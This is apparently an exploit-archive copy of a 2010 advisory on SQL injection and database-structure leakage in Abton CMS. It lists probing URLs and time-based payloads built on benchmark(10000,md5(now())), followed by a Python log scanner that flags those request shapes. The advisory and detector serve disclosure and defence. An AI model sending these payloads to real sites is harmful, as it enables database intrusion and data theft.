Abton CMS remote SQL injection vulnerability

2010-03-11T00:00:00
ID 1337DAY-ID-11268
Type zdt
Reporter MustLive
Modified 2010-03-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
============================================
Abton CMS remote SQL Injection vulnerability
============================================

-----------------------------
Details:

These are SQL DB Structure Extraction and SQL Injection vulnerabilities.

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/?/

http://site/rus/?/

http://site/rus/referaty/1/-1/

http://site/abton/

Sites running this engine have many such vulnerabilities, which lead
to leakage of the DB structure.

SQL Injection:

http://site/rus/details/?+benchmark(10000,md5(now()))+?/

http://site/rus/referaty/1'+benchmark(10000,md5(now()))-?1/

http://site/rus/?+benchmark(10000,md5(now()))+?/

All versions of Abton before the version in which the developers
fixed these holes are vulnerable.
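
To look for the request shapes listed above in web-server access logs, a check along these lines can be used. It is an added example, not part of the original advisory: the log lines are constructed, and the segment allowlist and the premise that the site serves no legitimate query strings are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Mar/2010:10:00:01 +0000] "GET /rus/details/13220/ HTTP/1.1" 200 5120
192.0.2.44 - - [11/Mar/2010:10:00:07 +0000] "GET /rus/referaty/?/ HTTP/1.1" 200 812
192.0.2.44 - - [11/Mar/2010:10:00:09 +0000] "GET /rus/referaty/1/-1/ HTTP/1.1" 200 790
192.0.2.44 - - [11/Mar/2010:10:00:15 +0000] "GET /rus/details/?+benchmark(10000,md5(now()))+?/ HTTP/1.1" 200 5120
192.0.2.44 - - [11/Mar/2010:10:00:31 +0000] "GET /rus/referaty/1%27+BENCHMARK%2810000,md5(now()))-?1/ HTTP/1.1" 200 790
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
BENCHMARK = re.compile(r"\bbenchmark\s*\(", re.IGNORECASE)
# Assumption: legitimate path segments are lowercase words or non-negative integers.
SEGMENT_OK = re.compile(r"[a-z0-9]+")


def classify(target):
    """Return the set of findings for one raw request target."""
    decoded = unquote_plus(target)  # handles %27 / %28 and "+" as space
    findings = set()
    if BENCHMARK.search(decoded):
        findings.add("sql-function-in-url")
    # Split the raw target, not the parsed path: a literal "?" starts the
    # query string, so a path-only check never sees what follows it.
    segments = [s for s in decoded.split("/") if s]
    if any(not SEGMENT_OK.fullmatch(s) for s in segments):
        findings.add("malformed-segment")
    return findings


def scan(log_text):
    """Return (target, findings) for each log line with at least one finding."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if match:
            findings = classify(match.group(1))
            if findings:
                hits.append((match.group(1), findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(sorted(findings), target)
```

A request with a well-formed but nonexistent ID is indistinguishable from normal traffic at this layer, so pair the URL check with alerting on database error text in responses.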




#  0day.today [2018-03-28]  #